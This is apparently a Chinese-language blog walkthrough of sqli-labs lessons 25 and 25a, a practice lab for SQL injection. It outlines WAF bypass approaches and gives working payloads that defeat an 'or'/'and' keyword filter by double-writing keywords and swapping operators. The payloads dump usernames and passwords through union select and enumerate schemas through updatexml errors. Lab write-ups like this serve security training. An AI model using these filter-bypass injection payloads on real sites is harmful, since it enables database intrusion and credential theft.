sql-lib闯关之lesson25-25a

LESS25
知识铺垫
WAF绕过
1.白盒绕过
 通过源代码分析,来进行绕过。
2.黑盒绕过
①架构层面绕过waf
②资源限制角度绕过waf
③协议层面绕过waf
④规则层面绕过waf
3.fuzz测试
具体可以自行百度了解。

1.观察源码以及关卡显示,我们发现将 or and(不区分大小写) 转义变成了空格。
sql-lib闯关之lesson25-25a

 

 sql-lib闯关之lesson25-25a

 

 2.方法一:利用双写

输入:?id=-1' union select 1,2,group_concat(concat_ws('-',username,passwoorrd)) from security.users --+
因为password中也有or所以双写
sql-lib闯关之lesson25-25a

 

 3.方法二:关键字替换  
and 等价于&&
or等价于 ||
like 等价于=
<> 等价于!=

输入:?id=0' || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+
这里之所以不使用 group_concat 是因为数据会显示不完整 所以用 limit 逐次显示。
LESS25a
这一关与上关的区别在于 这关 并没有包裹  上关是有单引号包裹 即 ‘’
所以输入:?id=-1 union select 1,2,group_concat(concat_ws('-',username,passwoorrd)) from security.users --+

sql-lib闯关之lesson25-25a

 

 

 

上一篇:sql bypass waf fuzz python


下一篇:如何打造一款优秀的waf产品(4)